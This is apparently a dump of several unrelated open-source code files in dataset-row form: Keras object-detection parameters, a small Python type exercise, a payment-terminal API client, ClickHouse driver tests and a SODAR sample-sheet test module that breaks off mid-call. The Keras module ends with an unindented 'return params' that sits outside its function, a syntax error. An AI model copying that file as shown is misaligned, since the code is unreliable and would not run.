] | null | null | null | detection/app_params.py | ckyrkou/Keras_Object_Detection | 3aa84632b3454f1440498e424133437d2c242e2d | [
"MIT"
] | null | null | null | detection/app_params.py | ckyrkou/Keras_Object_Detection | 3aa84632b3454f1440498e424133437d2c242e2d | [
"MIT"
] | null | null | null | # __
# / *_)
# _.----. _ /../
# /............./
# __/..(...|.(...|
# /__.-|_|--|_|
#
# Christos Kyrkou, PhD
# 2019
from .utils import yolo_params
import numpy as np
import pickle
def get_app_params(app, batch_size):
    """
    Build detection parameters for a known application/dataset.

    Bundles class labels, colors, anchor boxes, grid geometry, loss weights
    and data directories for the selected dataset into a yolo_params object.

    :param app: Dataset key, one of 'pets_2009', 'pennfudan', 'voc_2012_det',
        'vedai', 'kangaroo', 'facemask', 'raccoon'
    :param batch_size: Training batch size forwarded to yolo_params
    :return: yolo_params instance (its settings are printed before returning)
    :raise ValueError: If `app` is not a known dataset key
    """
    annformat = 'pascalvoc'

    # Shared palettes, labels and anchor sets used by several datasets
    VOC_COLORS = [(128, 0, 0), (0, 128, 0), (128, 128, 0),
                  (0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
                  (64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
                  (64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
                  (0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
                  (0, 64, 128)]
    VOC_LABELS = ['aeroplane', 'bicycle', 'bird', 'boat',
                  'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
                  'diningtable', 'dog', 'horse', 'motorbike', 'person',
                  'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
    # Anchor (w, h) pairs estimated on VOC, rescaled per dataset below
    VOC_ANCHOR_BASE = np.array(
        [1.05, 1.86, 3.14, 4.51, 4.18, 9.73, 8.51, 9.36, 13.49, 13.02]
    )
    KANGA_ANCHORS = [5.03, 5.62, 7.29, 17.55, 13.27, 24.55,
                     14.30, 13.39, 23.19, 22.60]
    VOC_DIRS = ('./dataset/JPG_VOC/', './data/JPG_VOC/')  # (img_dir, ann_dir)
    KANGA_DIRS = ('./dataset/JPG_Kanga/', './dataset/JPG_Kanga/')

    # Per-app configuration tuple:
    #   (colors, labels, input size, grid cells per side, anchors,
    #    (noobj_conf, obj_conf, obj_coor, obj_class) loss weights,
    #    true-box buffer size, (img_dir, ann_dir))
    configs = {
        'pets_2009': ([(128, 128, 0)], ['ped'], 320, 10,
                      VOC_ANCHOR_BASE * 24 / 320,
                      (1., 1.0, 1.0, 1.0), 100, VOC_DIRS),
        'pennfudan': ([(128, 128, 0)], ['ped'], 320, 10,
                      VOC_ANCHOR_BASE * 24 / 320,
                      (0.1, 1.0, 5.0, 1.0), 100, VOC_DIRS),
        'voc_2012_det': (VOC_COLORS, VOC_LABELS, 416, 13,
                         VOC_ANCHOR_BASE * (22 / 320),
                         (1., 1.0, 5.0, 1.0), 100, VOC_DIRS),
        'vedai': (VOC_COLORS, ['car'], 512, 16,
                  VOC_ANCHOR_BASE * (22 / 320),
                  (0.5, 1.0, 5.0, 1.0), 100, VOC_DIRS),
        'kangaroo': ([(0, 0, 255)], ['kangaroo'], 320, 10, KANGA_ANCHORS,
                     (0.05, 1.0, 10.0, 1.0), 10, KANGA_DIRS),
        'facemask': ([(0, 0, 255), (255, 0, 0)], ['mask', 'no-mask'],
                     320, 10, KANGA_ANCHORS,
                     (0.1, 1.0, 5.0, 1.0), 10, KANGA_DIRS),
        'raccoon': ([(0, 0, 255)], ['raccoon'], 320, 10, KANGA_ANCHORS,
                    (0.1, 1.0, 5.0, 1.0), 10, KANGA_DIRS),
    }
    if app not in configs:
        # Previously an unknown app fell through to a NameError; fail clearly.
        raise ValueError('Unknown app: %s' % app)
    (COLORS, LABELS, norm, grid, ANCHORS,
     loss_weights, TRUE_BOX_BUFFER, dirs) = configs[app]

    NORM_H = NORM_W = norm
    GRID_H = GRID_W = grid
    # One anchor box per (width, height) pair
    BOX = int(len(ANCHORS) / 2)
    CLASS = len(LABELS)
    CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
    THRESHOLD = 0.5
    NOOBJ_CONF, OBJ_CONF, OBJ_COOR, OBJ_CLASS = loss_weights
    WARMUP_BATCHES = 0
    DET_TYPE = 'YOLO'
    img_dir, ann_dir = dirs

    params = yolo_params(
        DET_TYPE, LABELS, COLORS, NORM_H, NORM_W, GRID_H, GRID_W, BOX, CLASS,
        CLASS_WEIGHTS, THRESHOLD, ANCHORS, NOOBJ_CONF, OBJ_CONF, OBJ_COOR,
        OBJ_CLASS, TRUE_BOX_BUFFER, batch_size, WARMUP_BATCHES,
        img_dir, ann_dir, annformat)
    params.print_params()
return params | 40.552511 | 154 | 0.5076 | 1,346 | 8,881 | 3.125557 | 0.10104 | 0.056572 | 0.074162 | 0.068457 | 0.858331 | 0.858331 | 0.858331 | 0.858331 | 0.850963 | 0.850963 | 0 | 0.139112 | 0.325752 | 8,881 | 219 | 155 | 40.552511 | 0.56346 | 0.167436 | 0 | 0.784314 | 0 | 0 | 0.076761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006536 | false | 0 | 0.019608 | 0 | 0.03268 | 0.006536 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
72d0548a89fa05c4da2c53657ca32225b81e57d3 | 82 | py | Python | Manzhula_Oleg_dz_2/task_2_1.py | Zalotny/GB_Python_Basics_Course | 8597368661a74777955f0a7cdc8a24dc1bcae243 | [
"MIT"
] | null | null | null | Manzhula_Oleg_dz_2/task_2_1.py | Zalotny/GB_Python_Basics_Course | 8597368661a74777955f0a7cdc8a24dc1bcae243 | [
"MIT"
] | null | null | null | Manzhula_Oleg_dz_2/task_2_1.py | Zalotny/GB_Python_Basics_Course | 8597368661a74777955f0a7cdc8a24dc1bcae243 | [
"MIT"
] | null | null | null | print(type(15 * 3))
# Print the result type of each remaining arithmetic operator:
# true division yields float, floor division and power yield int here.
for expression_result in (15 / 3, 15 // 2, 15 ** 2):
    print(type(expression_result))
| 16.4 | 20 | 0.585366 | 16 | 82 | 3 | 0.3125 | 0.75 | 0.916667 | 0.5 | 0.729167 | 0.729167 | 0.729167 | 0 | 0 | 0 | 0 | 0.171429 | 0.146341 | 82 | 4 | 21 | 20.5 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
f42645615c504daa8dc98570a57ca8113f3fd90d | 12,235 | py | Python | trustpayments/api/payment_terminal_till_service_api.py | TrustPayments/python-sdk | 6fde6eb8cfce270c3612a2903a845c13018c3bb9 | [
"Apache-2.0"
] | null | null | null | trustpayments/api/payment_terminal_till_service_api.py | TrustPayments/python-sdk | 6fde6eb8cfce270c3612a2903a845c13018c3bb9 | [
"Apache-2.0"
] | null | null | null | trustpayments/api/payment_terminal_till_service_api.py | TrustPayments/python-sdk | 6fde6eb8cfce270c3612a2903a845c13018c3bb9 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
import six
from trustpayments.api_client import ApiClient
class PaymentTerminalTillServiceApi:
def __init__(self, configuration):
self.api_client = ApiClient(configuration=configuration)
def perform_transaction(self, space_id, transaction_id, terminal_id, **kwargs):
"""Perform Payment Terminal Transaction
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction(space_id, transaction_id, terminal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param int terminal_id: The ID of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
kwargs['_request_timeout'] = 90
if kwargs.get('async_req'):
return self.perform_transaction_with_http_info(space_id, transaction_id, terminal_id, **kwargs)
else:
(data) = self.perform_transaction_with_http_info(space_id, transaction_id, terminal_id, **kwargs)
return data
def perform_transaction_with_http_info(self, space_id, transaction_id, terminal_id, **kwargs):
"""Perform Payment Terminal Transaction
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction_with_http_info(space_id, transaction_id, terminal_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param int terminal_id: The ID of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['space_id', 'transaction_id', 'terminal_id', 'language']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method perform_transaction" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'space_id' is set
if ('space_id' not in params or
params['space_id'] is None):
raise ValueError("Missing the required parameter `space_id` when calling `perform_transaction`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params or
params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `perform_transaction`")
# verify the required parameter 'terminal_id' is set
if ('terminal_id' not in params or
params['terminal_id'] is None):
raise ValueError("Missing the required parameter `terminal_id` when calling `perform_transaction`")
collection_formats = {}
path_params = {}
query_params = []
if 'space_id' in params:
query_params.append(('spaceId', params['space_id']))
if 'transaction_id' in params:
query_params.append(('transactionId', params['transaction_id']))
if 'terminal_id' in params:
query_params.append(('terminalId', params['terminal_id']))
if 'language' in params:
query_params.append(('language', params['language']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=utf-8'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json;charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/payment-terminal-till/perform-transaction', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Transaction',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def perform_transaction_by_identifier(self, space_id, transaction_id, terminal_identifier, **kwargs):
"""Perform Payment Terminal Transaction (using TID)
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction_by_identifier(space_id, transaction_id, terminal_identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param str terminal_identifier: The identifier (aka TID) of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
kwargs['_request_timeout'] = 90
if kwargs.get('async_req'):
return self.perform_transaction_by_identifier_with_http_info(space_id, transaction_id, terminal_identifier, **kwargs)
else:
(data) = self.perform_transaction_by_identifier_with_http_info(space_id, transaction_id, terminal_identifier, **kwargs)
return data
def perform_transaction_by_identifier_with_http_info(self, space_id, transaction_id, terminal_identifier, **kwargs):
"""Perform Payment Terminal Transaction (using TID)
Starts a payment terminal transaction and waits for its completion. If the call returns with a long polling timeout status, you may try again. The processing of the transaction will be picked up where it was left off.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.perform_transaction_by_identifier_with_http_info(space_id, transaction_id, terminal_identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int space_id: (required)
:param int transaction_id: The ID of the transaction which is used to process with the terminal. (required)
:param str terminal_identifier: The identifier (aka TID) of the terminal which should be used to process the transaction. (required)
:param str language: The language in which the messages should be rendered in.
:return: Transaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['space_id', 'transaction_id', 'terminal_identifier', 'language']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method perform_transaction_by_identifier" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'space_id' is set
if ('space_id' not in params or
params['space_id'] is None):
raise ValueError("Missing the required parameter `space_id` when calling `perform_transaction_by_identifier`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params or
params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `perform_transaction_by_identifier`")
# verify the required parameter 'terminal_identifier' is set
if ('terminal_identifier' not in params or
params['terminal_identifier'] is None):
raise ValueError("Missing the required parameter `terminal_identifier` when calling `perform_transaction_by_identifier`")
collection_formats = {}
path_params = {}
query_params = []
if 'space_id' in params:
query_params.append(('spaceId', params['space_id']))
if 'transaction_id' in params:
query_params.append(('transactionId', params['transaction_id']))
if 'terminal_identifier' in params:
query_params.append(('terminalIdentifier', params['terminal_identifier']))
if 'language' in params:
query_params.append(('language', params['language']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=utf-8'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json;charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/payment-terminal-till/perform-transaction-by-identifier', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Transaction',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.607004 | 225 | 0.66179 | 1,466 | 12,235 | 5.297408 | 0.106412 | 0.027041 | 0.032449 | 0.036055 | 0.952485 | 0.936132 | 0.910894 | 0.907031 | 0.907031 | 0.885913 | 0 | 0.000993 | 0.259583 | 12,235 | 256 | 226 | 47.792969 | 0.856276 | 0.362239 | 0 | 0.742857 | 0 | 0 | 0.250068 | 0.078163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.021429 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f4283ce1ba90d6443c13406aaa185fd8261d7fba | 3,197 | py | Python | tests/columns/test_simpleaggregatefunction.py | fasttrack-solutions/clickhouse-driver | 676dfb09f74b8b55bfecaedbe70ddc971e1badd7 | [
"MIT"
] | 823 | 2017-05-16T15:30:15.000Z | 2022-03-31T08:39:04.000Z | tests/columns/test_simpleaggregatefunction.py | fasttrack-solutions/clickhouse-driver | 676dfb09f74b8b55bfecaedbe70ddc971e1badd7 | [
"MIT"
] | 277 | 2017-07-11T11:35:34.000Z | 2022-03-08T06:52:09.000Z | tests/columns/test_simpleaggregatefunction.py | fasttrack-solutions/clickhouse-driver | 676dfb09f74b8b55bfecaedbe70ddc971e1badd7 | [
"MIT"
] | 175 | 2017-10-11T08:41:12.000Z | 2022-03-22T03:59:35.000Z | from enum import IntEnum
from tests.testcase import BaseTestCase
class SimpleAggregateFunctionTestCase(BaseTestCase):
    """Round-trip tests for the SimpleAggregateFunction column type."""

    required_server_version = (19, 8, 3)

    def _check_round_trip(self, column_spec, rows, cli_output, expected):
        """
        Insert *rows* into a one-column table with the given spec, then
        verify both the CLI rendering and the values read back through
        the native client.
        """
        with self.create_table(column_spec):
            self.client.execute('INSERT INTO test (a) VALUES', rows)
            query = 'SELECT * FROM test'
            self.assertEqual(self.emit_cli(query), cli_output)
            self.assertEqual(self.client.execute(query), expected)

    def test_simple(self):
        rows = [(3, ), (2, )]
        self._check_round_trip(
            'a SimpleAggregateFunction(any, Int32)', rows, '3\n2\n', rows
        )

    def test_nullable(self):
        rows = [(3, ), (None, ), (2, )]
        self._check_round_trip(
            'a SimpleAggregateFunction(any, Nullable(Int32))',
            rows, '3\n\\N\n2\n', rows
        )

    def test_simple_agg_function(self):
        # Enum values may be inserted as IntEnum members or as raw ints;
        # both come back as the enum's string name.
        class A(IntEnum):
            hello = -1
            world = 2

        self._check_round_trip(
            "a SimpleAggregateFunction(anyLast, "
            "Enum8('hello' = -1, 'world' = 2))",
            [(A.hello,), (A.world,), (-1,), (2,)],
            'hello\nworld\nhello\nworld\n',
            [('hello',), ('world',), ('hello',), ('world',)],
        )

    def test_simple_agg_function_nullable(self):
        class A(IntEnum):
            hello = -1
            world = 2

        self._check_round_trip(
            "a SimpleAggregateFunction(anyLast, "
            "Nullable(Enum8('hello' = -1, 'world' = 2)))",
            [(A.hello,), (A.world,), (None,), (-1,), (2,)],
            'hello\nworld\n\\N\nhello\nworld\n',
            [('hello',), ('world',), (None, ), ('hello',), ('world',)],
        )
| 28.544643 | 67 | 0.443541 | 278 | 3,197 | 5.032374 | 0.183453 | 0.057184 | 0.097212 | 0.160114 | 0.836312 | 0.75268 | 0.75268 | 0.75268 | 0.75268 | 0.75268 | 0 | 0.016584 | 0.434157 | 3,197 | 111 | 68 | 28.801802 | 0.756772 | 0 | 0 | 0.622222 | 0 | 0 | 0.165155 | 0.044417 | 0 | 0 | 0 | 0 | 0.088889 | 1 | 0.044444 | false | 0 | 0.022222 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be39f8ae4422c3257f84c2e9ff44ecc091a1eb9d | 71,458 | py | Python | samplesheets/tests/test_views_taskflow.py | bihealth/sodar-server | 0c6a03c274ab34cd8987280fe97dc8989551d4bd | [
"MIT"
] | null | null | null | samplesheets/tests/test_views_taskflow.py | bihealth/sodar-server | 0c6a03c274ab34cd8987280fe97dc8989551d4bd | [
"MIT"
] | 1 | 2021-05-28T10:59:49.000Z | 2021-06-03T12:30:23.000Z | samplesheets/tests/test_views_taskflow.py | bihealth/sodar-server | 0c6a03c274ab34cd8987280fe97dc8989551d4bd | [
"MIT"
] | null | null | null | """Integration tests for views in the samplesheets Django app with taskflow"""
# NOTE: You must supply 'sodar_url': self.live_server_url in taskflow requests!
from datetime import timedelta
import irods
import os
from django.conf import settings
from django.contrib import auth
from django.contrib.messages import get_messages
from django.test import override_settings
from django.urls import reverse
from django.utils import timezone
from unittest import skipIf
# Projectroles dependency
from projectroles.app_settings import AppSettingAPI
from projectroles.models import SODAR_CONSTANTS
from projectroles.plugins import get_backend_api
from projectroles.tests.test_views_taskflow import TestTaskflowBase
from samplesheets.forms import ERROR_MSG_INVALID_PATH
from samplesheets.models import (
Investigation,
IrodsAccessTicket,
IrodsDataRequest,
)
from samplesheets.tests.test_io import SampleSheetIOMixin, SHEET_DIR
from samplesheets.utils import get_sample_colls
from samplesheets.views import (
TRACK_HUBS_COLL,
IRODS_REQ_CREATE_ALERT_NAME,
)
app_settings = AppSettingAPI()
User = auth.get_user_model()
# SODAR constants
PROJECT_ROLE_OWNER = SODAR_CONSTANTS['PROJECT_ROLE_OWNER']
PROJECT_ROLE_DELEGATE = SODAR_CONSTANTS['PROJECT_ROLE_DELEGATE']
PROJECT_ROLE_CONTRIBUTOR = SODAR_CONSTANTS['PROJECT_ROLE_CONTRIBUTOR']
PROJECT_ROLE_GUEST = SODAR_CONSTANTS['PROJECT_ROLE_GUEST']
PROJECT_TYPE_CATEGORY = SODAR_CONSTANTS['PROJECT_TYPE_CATEGORY']
PROJECT_TYPE_PROJECT = SODAR_CONSTANTS['PROJECT_TYPE_PROJECT']
SUBMIT_STATUS_OK = SODAR_CONSTANTS['SUBMIT_STATUS_OK']
SUBMIT_STATUS_PENDING = SODAR_CONSTANTS['SUBMIT_STATUS_PENDING']
SUBMIT_STATUS_PENDING_TASKFLOW = SODAR_CONSTANTS[
'SUBMIT_STATUS_PENDING_TASKFLOW'
]
# Local constants
APP_NAME = 'samplesheets'
SHEET_PATH = SHEET_DIR + 'i_small.zip'
TASKFLOW_ENABLED = (
True if 'taskflow' in settings.ENABLED_BACKEND_PLUGINS else False
)
TASKFLOW_SKIP_MSG = 'Taskflow not enabled in settings'
BACKENDS_ENABLED = all(
_ in settings.ENABLED_BACKEND_PLUGINS for _ in ['omics_irods', 'taskflow']
)
BACKEND_SKIP_MSG = (
'Required backends (taskflow, omics_irods) ' 'not enabled in settings'
)
TEST_FILE_NAME = 'test1'
TEST_FILE_NAME2 = 'test2'
DUMMY_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
PUBLIC_USER_NAME = 'user_no_roles'
PUBLIC_USER_PASS = 'password'
class SampleSheetTaskflowMixin:
    """Taskflow helpers for samplesheets tests"""

    def _make_irods_colls(self, investigation, request=None):
        """
        Create iRODS collection structure for investigation.

        :param investigation: Investigation object
        :param request: HTTP request object (optional, default=None)
        :raise taskflow.FlowSubmitException if submit fails
        """
        self.assertEqual(investigation.irods_status, False)
        project = investigation.project
        flow_data = {
            'colls': get_sample_colls(investigation),
            'public_guest_access': project.public_guest_access,
        }
        submit_kwargs = {
            'project_uuid': project.sodar_uuid,
            'flow_name': 'sheet_colls_create',
            'flow_data': flow_data,
            'request': request,
        }
        # Without a request object, taskflow needs an explicit callback URL
        if not request:
            submit_kwargs['sodar_url'] = self.live_server_url
        self.taskflow.submit(**submit_kwargs)
        investigation.refresh_from_db()
        self.assertEqual(investigation.irods_status, True)

    def _make_track_hub_coll(self, session, assay_path, name):
        """
        Create iRODS collection for a track hub under assay collection.
        """
        parent_path = assay_path + '/TrackHubs'
        # Ensure the TrackHubs parent collection exists before creating
        try:
            session.collections.get(parent_path)
        except irods.exception.CollectionDoesNotExist:
            session.collections.create(parent_path)
        return session.collections.create(parent_path + '/' + name).path
class SampleSheetPublicAccessMixin:
    """Helpers for sample sheet public access modification with taskflow"""

    def set_public_access(self, access):
        """
        Set project public access by issuing a project update POST request.

        :param access: Bool
        """
        update_url = reverse(
            'projectroles:api_project_update',
            kwargs={'project': self.project.sodar_uuid},
        )
        with self.login(self.user):
            response = self.client.patch(
                update_url,
                format='json',
                data={'public_guest_access': access},
                content_type='application/json',
            )
        self.assertEqual(response.status_code, 200)
        self.project.refresh_from_db()
        self.assertEqual(self.project.public_guest_access, access)
@skipIf(not TASKFLOW_ENABLED, TASKFLOW_SKIP_MSG)
class TestIrodsCollsCreateView(
    SampleSheetIOMixin, SampleSheetPublicAccessMixin, TestTaskflowBase
):
    """Tests for iRODS collection structure creation view with taskflow"""

    def setUp(self):
        super().setUp()
        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        # Import investigation (no iRODS collections created yet)
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()

    def test_create_colls(self):
        """Test collection structure creation with taskflow"""
        # Assert precondition: no iRODS structure before the POST
        self.assertEqual(self.investigation.irods_status, False)

        # Issue POST request
        values = {
            'sodar_url': self.live_server_url
        }  # HACK: Override callback URL for the test live server
        with self.login(self.user):
            response = self.client.post(
                reverse(
                    'samplesheets:collections',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                values,
            )

        # Assert redirect back to the project sheets view
        with self.login(self.user):
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:project_sheets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )

        # Assert sample sheet collection structure state after creation
        self.investigation.refresh_from_db()
        self.assertEqual(self.investigation.irods_status, True)

        # Assert app setting status (should be unset: without public guest
        # access no anonymous access ticket is issued)
        self.assertEqual(
            app_settings.get_app_setting(
                APP_NAME, 'public_access_ticket', project=self.project
            ),
            '',
        )

    @override_settings(PROJECTROLES_ALLOW_ANONYMOUS=True)
    def test_create_colls_anon(self):
        """Test collection structure creation with anonymous project access"""
        self.set_public_access(True)

        # Assert preconditions: no structure, no ticket yet
        self.assertEqual(self.investigation.irods_status, False)
        self.assertEqual(
            app_settings.get_app_setting(
                APP_NAME, 'public_access_ticket', project=self.project
            ),
            '',
        )

        # Issue POST request
        values = {
            'sodar_url': self.live_server_url
        }  # HACK: Override callback URL for the test live server
        with self.login(self.user):
            response = self.client.post(
                reverse(
                    'samplesheets:collections',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                values,
            )

        # Assert redirect back to the project sheets view
        with self.login(self.user):
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:project_sheets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )

        # Assert sample sheet collection structure state after creation
        self.investigation.refresh_from_db()
        self.assertEqual(self.investigation.irods_status, True)

        # Assert app setting status (should now be set: public guest access
        # causes an anonymous access ticket string to be stored)
        self.assertNotEqual(
            app_settings.get_app_setting(
                APP_NAME, 'public_access_ticket', project=self.project
            ),
            '',
        )
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestSampleSheetDeleteView(
    SampleSheetIOMixin, SampleSheetTaskflowMixin, TestTaskflowBase
):
    """Tests for sample sheet deletion with taskflow"""

    def setUp(self):
        super().setUp()
        self.irods_backend = get_backend_api('omics_irods')

        # Make project with owner in Taskflow and Django
        self.project, self.owner_as = self._make_project_taskflow(
            title='TestProject',
            type=PROJECT_TYPE_PROJECT,
            parent=self.category,
            owner=self.user,
            description='description',
        )
        # Import investigation
        self.investigation = self._import_isa_from_file(
            SHEET_PATH, self.project
        )
        self.study = self.investigation.studies.first()
        self.assay = self.study.assays.first()

    def test_delete(self):
        """Test sample sheet deleting with taskflow"""
        # Assert precondition
        self.assertIsNotNone(self.investigation)

        # Issue POST request
        values = {
            'delete_host_confirm': 'testserver',
            'sodar_url': self.live_server_url,
        }
        with self.login(self.user):
            response = self.client.post(
                reverse(
                    'samplesheets:delete',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                values,
            )

        # Assert investigation state after deletion
        with self.assertRaises(Investigation.DoesNotExist):
            Investigation.objects.get(
                project__sodar_uuid=self.project.sodar_uuid
            )

        # Assert redirect
        with self.login(self.user):
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:project_sheets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )

    def test_delete_files_owner(self):
        """Test sample sheet deleting with files in irods as owner"""
        # Create collections and file in iRODS
        self._make_irods_colls(self.investigation)
        # NOTE: local name must not shadow the module-level "irods" import
        irods_session = self.irods_backend.get_session()
        assay_path = self.irods_backend.get_path(self.assay)
        file_path = assay_path + '/' + TEST_FILE_NAME
        irods_session.data_objects.create(file_path)

        # Assert precondition
        self.assertEqual(irods_session.data_objects.exists(file_path), True)

        # Issue POST request
        values = {
            'delete_host_confirm': 'testserver',
            'sodar_url': self.live_server_url,
        }
        with self.login(self.user):
            response = self.client.post(
                reverse(
                    'samplesheets:delete',
                    kwargs={'project': self.project.sodar_uuid},
                ),
                values,
            )

        # Assert investigation state after deletion
        with self.assertRaises(Investigation.DoesNotExist):
            Investigation.objects.get(
                project__sodar_uuid=self.project.sodar_uuid
            )

        # Assert file status (owner may delete sheets with files)
        self.assertEqual(irods_session.data_objects.exists(file_path), False)

        # Assert redirect
        with self.login(self.user):
            self.assertRedirects(
                response,
                reverse(
                    'samplesheets:project_sheets',
                    kwargs={'project': self.project.sodar_uuid},
                ),
            )

    def test_delete_files_contributor(self):
        """Test sample sheet deleting with files in irods as contributor"""
        # Create contributor user
        user_contributor = self.make_user('user_contributor')
        self._make_assignment_taskflow(
            self.project, user_contributor, self.role_contributor
        )

        # Create collections and file in iRODS
        self._make_irods_colls(self.investigation)
        # NOTE: local name must not shadow the module-level "irods" import
        irods_session = self.irods_backend.get_session()
        assay_path = self.irods_backend.get_path(self.assay)
        file_path = assay_path + '/' + TEST_FILE_NAME
        irods_session.data_objects.create(file_path)

        # Assert precondition
        self.assertEqual(irods_session.data_objects.exists(file_path), True)

        # Issue POST request
        values = {
            'delete_host_confirm': 'testserver',
            'sodar_url': self.live_server_url,
        }
        with self.login(user_contributor):
            response = self.client.post(
                reverse(
                    'samplesheets:delete',
                    kwargs={'project': self.project.sodar_uuid},
                ),
